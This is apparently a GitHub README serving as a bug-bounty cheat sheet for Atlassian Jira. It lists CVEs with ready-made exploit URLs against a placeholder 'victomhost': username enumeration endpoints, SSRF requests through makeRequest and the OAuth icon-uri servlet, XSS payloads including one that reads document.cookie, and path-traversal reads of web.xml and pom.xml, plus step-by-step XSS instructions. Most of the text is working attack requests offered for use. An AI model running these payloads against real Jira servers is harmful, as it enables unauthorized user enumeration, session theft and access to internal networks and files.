Skip to content

sushantdhopat/JIRA_testing

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 

Repository files navigation

JIRA_testing

cve-2019-8449 - Username enumeration throw informaton disclosure vulnerability

The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. https://jira.atlassian.com/browse/JRASERVER-69796 https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true


cve-2019-8451:ssrf-response-body

The /plugins/servlet/gadgets/makeRequest resource in Jira before version 8.4.0 allows remote attackers to access the content of internal network resources via a Server Side Request Forgery (SSRF) vulnerability due to a logic bug in the JiraWhitelist class.

https://jira.atlassian.com/browse/JRASERVER-69793?jql=labels%20%3D%20 https://victomhost/plugins/servlet/gadgets/makeRequest?url=https://victomhost:[email protected]


RCE Jira=CVE-2019–11581

https://hackerone.com/reports/706841

/secure/ContactAdministrators!default.jspa


cve-2018-20824

vulnerable to Server Side Request Forgery (SSRF). This allowed a XSS and or a SSRF attack to be performed. More information about the Atlassian OAuth plugin issue see https://ecosystem.atlassian.net/browse/OAUTH-344 . When running in an environment like Amazon EC2, this flaw can used to access to a metadata resource that provides access credentials and other potentially confidential information.

https://victomhost/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)


cve-2020-14179 :- Information disclosure

Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. REF=https://jira.atlassian.com/browse/JRASERVER-71536 POC: https://victomhost/secure/QueryComponent!Default.jspa


cve-2020-14181 :- Enumerate user via information disclosure

Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint.

Ref=https://jira.atlassian.com/browse/JRASERVER-71560?jql=text%20~%20%22cve-2020-14181%22 POC: https://victomhost/secure/ViewUserHover.jspa

https://victomhost/ViewUserHover.jspa?username=Admin


https://hackerone.com/reports/380354 CVE-2018-5230 https://jira.atlassian.com/browse/JRASERVER-67289 HOW TO EXPLOIT: https://host/issues/?filter=-8 Go to the link above Click the "Updated Range:" text area Put your XSS payload in "More than [ ] minutes ago" (15 character payload limit) or in "In range [ ] to [ ]" (No length limit, ONLY put the payload in the first box) Click Update Payload will run. If it doesn't run chances are you used double quotes somewhere. Only use single quotes!


jira-unauthenticated-dashboards

https://victomhost/rest/api/2/dashboard?maxResults=100

jira-unauth-popular-filters https://victomhost/secure/ManageFilters.jspa?filter=popular&filterView=popular


jira-unauth-popular-filters

https://victomhost/secure/ManageFilters.jspa?filter=popular&filterView=popular https://hackerone.com/reports/197726 https://newrelic.atlassian.net/secure/ManageFilters.jspa?filterView=popular https://newrelic.atlassian.net/secure/ManageFilters.jspa?filterView=search

https://hackerone.com/reports/139970

https://host/secure/ConfigurePortalPages!default.jspa?view=popular https://host/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false


Xss

/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(‘XSS’)%22%3E.vm


CVE-2019-3403 :- user name enumeration throw information disclosure

Information disclosured vulnerability 1.()https://jira.atlassian.com/browse/JRASERVER-69242 visit the URL address,you can check the user whether is exist on this host /rest/api/2/user/picker?query=admin

So the attacker can enumerate all existing users on this jira server.


CVE-2019-8442 :- information disclosure

https://jira.atlassian.com/browse/JRASERVER-69241 visit the URL address,the server will leaking some server's information

/s/thiscanbeanythingyouwant/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml


CVE-2017-9506

https://blog.csdn.net/caiqiiqi/article/details/89017806 /plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.google.nl


CVE-2019-3402:[Jira]XSS in the labels gadget

/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=Search ConfigurePortalPages.jspa


CVE-2018-20824:[Jira]XSS in WallboardServlet through the cyclePeriod parameter

/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true


CVE-2017-9506

https://ecosystem.atlassian.net/browse/OAUTH-344 exploit an SSRF vulnerability in confluence and was able to perform several actions such as bypass any firewall/protection solutions, was able to perform XSPA through assessing the response times for ports, access Internal DoD Servers and internal services.

I discuss the vulnerabilities exploited in my write which you can find here, https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a

https://host/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json


username and email diclose

https://host/secure/popups/UserPickerBrowser.jspa


Atlassian Jira Unauth User Enumeration (CVE-2020-36289)

Jira < 8.5.13 8.6.0 ≤ Jira < 8.13.5 8.14.0 ≤ Jira < 8.15.1

PoC:

/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin


[CVE-2021-26086] Jira Limited Local File Read

http://host/s/1xZbMTX8rN8TQTr2s4oqjh5ntOo/_/;/WEB-INF/web.xml


[CVE-2020-29453] - Pre-Auth Limited Arbitrary File Read

http://host/s/1xqVb9EKKmXG4pzui1gHeg0yrna/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml

if its not running redirecting to login panel then run it with curl


/rest/menu/latest/admin?maxResults=1000

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published